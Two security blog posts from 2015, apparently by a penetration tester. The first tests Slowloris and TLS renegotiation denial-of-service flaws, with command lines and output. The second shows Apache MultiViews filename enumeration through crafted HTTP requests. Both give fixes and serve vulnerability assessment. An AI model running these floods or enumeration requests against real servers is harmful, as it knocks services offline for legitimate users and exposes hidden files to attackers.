05/03/2015

Symetric Denial of Service Testing - Aka 1 on 1

Intro

This post is going to explain how to test a Denial of Service Vulnerability without crashing the actual service. More specifically we will focus on two vulnerabilities a) the slowris vulnerability (also known as Apache Partial HTTP Request Denial of Service Vulnerability) and b) the TLS Renegotiation and Denial of Service Attacks.

Apache Partial HTTP Request Denial of Service Vulnerability

The target application Apache Server is vulnerable to a denial of service named Slow-DoS attack, due to holding a connection open for partial HTTP requests. Both Apache Versions 1.x and 2.x are vulnerable. Slow HTTP attacks are denial-of-service (DoS) attacks in which the attacker sends HTTP requests in pieces slowly, one at a time to a Web server. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. When the server’s concurrent connection pool reaches its maximum, this creates a DoS. Slow HTTP attacks are easy to execute because they require only minimal resources from the attacker.

Business Impact

A remote attacker can cause a denial of service against the Web server which would prevent legitimate users from accessing the site.

Remediation

There are no vendor-supplied patches available at this time.  Upgrade to the latest version.

Example

Slowloris tool output:



./slowloris.pl -dns xxx.xxx.xxx -port 80 -timeout 2000 -num 100 -tcpto 5
CCCCCCCCCCOOCCOOOOO888@8@8888OOOOCCOOO888888888@@@@@@@@@8@8@@@@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888@888888OOOCCCOOOO888888888888@88888@@@@@@@888@8OOCCoococc:::
CCCCCCCCCCCCCCOO88@@888888OOOOOOOOOO8888888O88888888O8O8OOO8888@88@@8OOCOOOCoc::
…[omitted]…
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
Multithreading enabled.
Connecting to xxx.xxx.xxx:80 every 2000 seconds with 100 sockets:
                Building sockets.
                Building sockets.
                Sending data.
Current stats:  Slowloris has now sent 446 packets successfully.
This thread now sleeping for 2000 seconds...

                Sending data.
Current stats:  Slowloris has now sent 500 packets successfully.
This thread now sleeping for 2000 seconds...


Hping3 output

 hping3 -T -p 80  xxx.xxx.xxx

HPING xxx.xxx.xxx (eth1 xxx.xxx.xxx): NO FLAGS are set, 40 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=xxx.xxx.xx. name=xxx
hop=1 hoprtt=0.6 ms
...[omitted]...
--- 192.168.0.2 hping statistic ---
10 packets transmitted, 21 packets received, 0% packet loss


Explanation 

In this scenario we send a low bust of packages using Slowloris and then launched Hping3 in port 80 (the same port as Slowloris) and saw that because the Slowloris open too many connections start receiving more packages than send.

TLS Protocol Session Renegotiation Security Vulnerability

TLS protocol is prone to a security vulnerability that allows for man-in-the-middle attacks and Denial of Service attacks. This issue does not allow attackers to decrypt encrypted data. More specifically, the issue exists in a way applications handle the session renegotiation process and may allow attackers to inject arbitrary plaintext into the beginning of application protocol stream.

  • In case of the HTTP protocol used with the vulnerable TLS implementation, this attack is carried out by intercepting 'Client Hello' requests and then forcing session renegotiation. An unauthorized attacker can then cause the webserver to process arbitrary requests that would otherwise require valid client side certificate for authorization. The attacker will not be able to gain direct access to the server response.
  •  Denial of Service attack is also be feasible. This attack further exploits the SSL secure Renegotiation feature to trigger thousands of renegotiation via single TCP connection and crush the service.

Business Impact

An adversary can potentially exploit the vulnerability and cause compromise of the confidentiality and availability of the vulnerable service.

Remediation

Man In The Middle Attack:

  • OpenSSL workaround- OpenSSL has provided a version (0.9.8l) that has a workaround. Please refer to OpenSSL Change Log (Changes between 0.9.8k and 0.9.8l Section).
  •  Microsoft workaround - Enable SSLAlwaysNegoClientCert on IIS 6 and above: Web servers running IIS 6 and later that are affected because they require mutual authentication by requesting a client certificate, can be hardened by enabling the SSLAlwaysNegoClientCert setting. This will cause IIS to prompt the client for a certificate upon the initial connection, and does not require a server-initiated renegotiation.
 For Denial of Service Attack –  No real solutions exists. The following steps can mitigate (but not solve) the problem:

  • Disable SSL-Renegotiation
  • Install SSL Accelerator
Example



host:xxx.xxx.xxx
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 44 [43.48 h/s], 16 Conn, 0 Err
Handshakes 118 [71.32 h/s], 25 Conn, 0 Err
Handshakes 193 [76.69 h/s], 32 Conn, 0 Err
Handshakes 290 [99.53 h/s], 38 Conn, 0 Err
Handshakes 371 [79.16 h/s], 43 Conn, 0 Err
Handshakes 459 [89.97 h/s], 48 Conn, 0 Err
Handshakes 545 [87.55 h/s], 52 Conn, 0 Err
Handshakes 632 [84.57 h/s], 56 Conn, 0 Err
Handshakes 728 [96.96 h/s], 60 Conn, 0 Err
Handshakes 819 [91.05 h/s], 63 Conn, 0 Err
Handshakes 913 [95.76 h/s], 66 Conn, 0 Err
Handshakes 989 [76.02 h/s], 70 Conn, 0 Err
Handshakes 1086 [96.98 h/s], 73 Conn, 0 Err
Handshakes 1165 [78.37 h/s], 77 Conn, 0 Err
Handshakes 1264 [97.87 h/s], 81 Conn, 0 Err
…[omitted]…
Handshakes 3642 [89.20 h/s], 144 Conn, 0 Err
Handshakes 3738 [92.35 h/s], 146 Conn, 0 Err
Handshakes 3828 [92.36 h/s], 148 Conn, 0 Err
Handshakes 3919 [93.75 h/s], 149 Conn, 0 Err
Handshakes 4003 [83.73 h/s], 151 Conn, 0 Err
Handshakes 4099 [90.18 h/s], 153 Conn, 0 Err
Handshakes 4197 [105.10 h/s], 155 Conn, 0 Err
Handshakes 4288 [90.83 h/s], 157 Conn, 0 Err
Handshakes 4379 [88.02 h/s], 159 Conn, 0 Err
Handshakes 4468 [88.77 h/s], 160 Conn, 0 Err
Handshakes 4568 [95.30 h/s], 162 Conn, 0 Err
Handshakes 4649 [87.94 h/s], 164 Conn, 0 Err
Handshakes 4743 [89.97 h/s], 166 Conn, 0 Err
Handshakes 4844 [106.67 h/s], 167 Conn, 0 Err
Handshakes 4930 [81.71 h/s], 169 Conn, 0 Err


Hping3 output

 hping3 -T -p 443 xxx.xxx.xxx

HPING xxx.xxx.xxx (eth1 xxx.xxx.xxx): NO FLAGS are set, 40 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=xxx.xxx.xx. name=xxx
hop=1 hoprtt=0.6 ms
...[omitted]...
--- xxx.xxx.xxx hping statistic ---
10 packets transmitted, 15 packets received, 0% packet loss

Conclusion

Running point and click hacking tools for testing for Symmetric  DoS vulnerabilities should not be a taboo. If this is done then there zero doubt that this specific vulnerability can be exploited e.g. the sys admin can use stress test tools to record the performance of the server etc.  

References:


16/02/2015

Apache mod_negotiation or MultiViews filename bruteforcing

Filename Brute-forcing through MultiViews Vulnerability


This is a small post about a way to easily get backup files on Apache web servers with Multiviews option enabled. There is no much information in Multiviews (an Apache feature) and some Web Application scanners report this as Apache mod_negotiation filename brute-forcing rather than Multiviews option enabled. Apache HTTPD supports content negotiation as described in the HTTP/1.1 specification (see http://www.w3.org/Protocols/rfc2616/rfc2616.html). It can choose the best representation of a resource based on the browser-supplied preferences for media type, languages, character set and encoding. It also implements a couple of features to give more intelligent handling of requests from browsers that send incomplete negotiation information.

What are resources

A resource is a conceptual entity identified by a URI (RFC 2396). An HTTP server like Apache HTTP Server provides access to representations of the resource(s) within its namespace, with each representation in the form of a sequence of bytes with a defined media type, character set, encoding, etc. Each resource may be associated with zero, one, or more than one representation at any given time. If multiple representations are available, the resource is referred to as negotiable and each of its representations is termed a variant. The ways in which the variants for a negotiable resource vary are called the dimensions of negotiation.

Negotiation in httpd

In order to negotiate a resource, the server needs to be given information about each of the variants. This is done in one of two ways:
  • Using a type map (i.e., a *.var file) which names the files containing the variants explicitly, or
  • Using a 'MultiViews' search, where the server does an implicit filename pattern match and chooses from among the results.
Using MultiViews to brute-force files

MultiViews is a per-directory option, meaning it can be set with an Options directive within a <Directory>, <Location> or <Files> section in httpd.conf, or (if AllowOverride is properly set) in .htaccess files.

The effect of MultiViews is as follows: if the server receives a request for /some/dir/foo, if /some/dir has MultiViews enabled, and /some/dir/foo does not exist, then the server reads the directory looking for files named foo.*, and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings it would have if the client had asked for one of them by name. It then chooses the best match to the client's requirements.

MultiViews is an Apache option which acts with the following rules:

"if you request from the server a file e.g. /some/dir/foo and does not exist, then the server reads the directory looking for files named foo.*, and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings it would have if the client had asked for one of them by name. It then chooses the best match to the client's requirements."

Impact

An attacker can use this functionality to aid in finding hidden file processes on the directory and potentially gather further sensitive information through the mod_negotiation module. mod_negotiation is an Apache module responsible for selecting the document that best matches the clients capabilities, from one of several available documents. If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. This behavior can help an attacker to learn more about his target, for example, generate a list of base names, generate a list of interesting extensions, and look for backup files and so on.

Proof Of Concept

Example 1:

Request:

GET /mymanual/de/glossarry.html HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept: application/xxx; q=1.0
Negotiate:*
User-Agent: xxx
Connection: close
Referer: http://xxx.xxx.xxx.xxx/test/se/
Cookie: LangID=2; PHPSESSID=xxxx


Response:

HTTP/1.1 300 Multiple Choices
Date: Tue, 16 Sep 2014 12:56:46 GMT
Server: Apache/2.2.22 (Linux/SUSE)
Alternates: {"glossary.html.de" 1 {type text/html} {charset iso-8859-1} {language de} {length 32714}}, {"glossary.html.en" 1 {type text/html} {charset iso-8859-1} {language en} {length 27855}}, {"glossary.html.es" 1 {type text/html} {charset iso-8859-1} {language es} {length 23586}}, {"glossary.html.fr" 1 {type text/html} {charset iso-8859-1} {language fr} {length 30561}}, {"glossary.html.ja.utf8" 1 {type text/html} {charset utf-8} {language ja} {length 30880}}, {"glossary.html.ko.euc-kr" 1 {type text/html} {charset euc-kr} {language ko} {length 19474}}, {"glossary.html.tr.utf8" 1 {type text/html} {charset utf-8} {language tr} {length 30911}}
Vary: negotiate,accept-language,accept-charset
TCN: list
Content-Length: 1039
Connection: close
Content-Type: text/html; charset=iso-8859-1
…[omitted]…
Note: In the first example we request for a specific file, the glossary.html and get the response displayed above.

Example 2:



Request:

GET /ba* HTTP/1.1
Host:xxx
Accept: application/whatever; q=1.0
Accept-charset: iso-8859-9
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0
Connection: close
Referer: http://xxx.xxx.xxx.xxx/manual/de/
Cookie: LangID=2; PHPSESSID=xxxx





Response:

HTTP/1.1 404 Not Found
Date: Tue, 16 Sep 2014 13:33:18 GMT
Server: Apache/2.2.22 (Linux/SUSE)
Alternates: {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-2} {language cs} {length 745}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language de} {length 766}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language en} {length 611}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {language es} {length 699}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language fr} {length 789}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language ga} {length 813}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language it} {length 692}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-2022-jp} {language ja} {length 749}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset euc-kr} {language ko} {length 703}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language nl} {length 688}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-2} {language pl} {length 707}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language pt-br} {length 753}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language pt} {length 272}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language ro} {length 689}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-5} {language sr} {length 716}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language sv} {length 722}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-9} {language tr} {length 755}}
Vary: accept-language,accept-charset
Content-Length: 409
Connection: close
Content-Type: text/html; charset=iso-8859-1
…[omitted]…


Note: In this example we request a file name using wild card characters e.g. *. More specifically .

Remediation 

Disable the MultiViews directive from Apache's configuration file and restart Apache. You can disable MultiViews by creating a .htaccess file containing the following line:

Options -Multiviews

References:
  1. http://www.wisec.it/sectou.php?id=4698ebdc59d15
  2. http://www.acunetix.com/vulnerabilities/apache-mod_negotiation-fi/
  3. http://www.securityfocus.com/bid/3009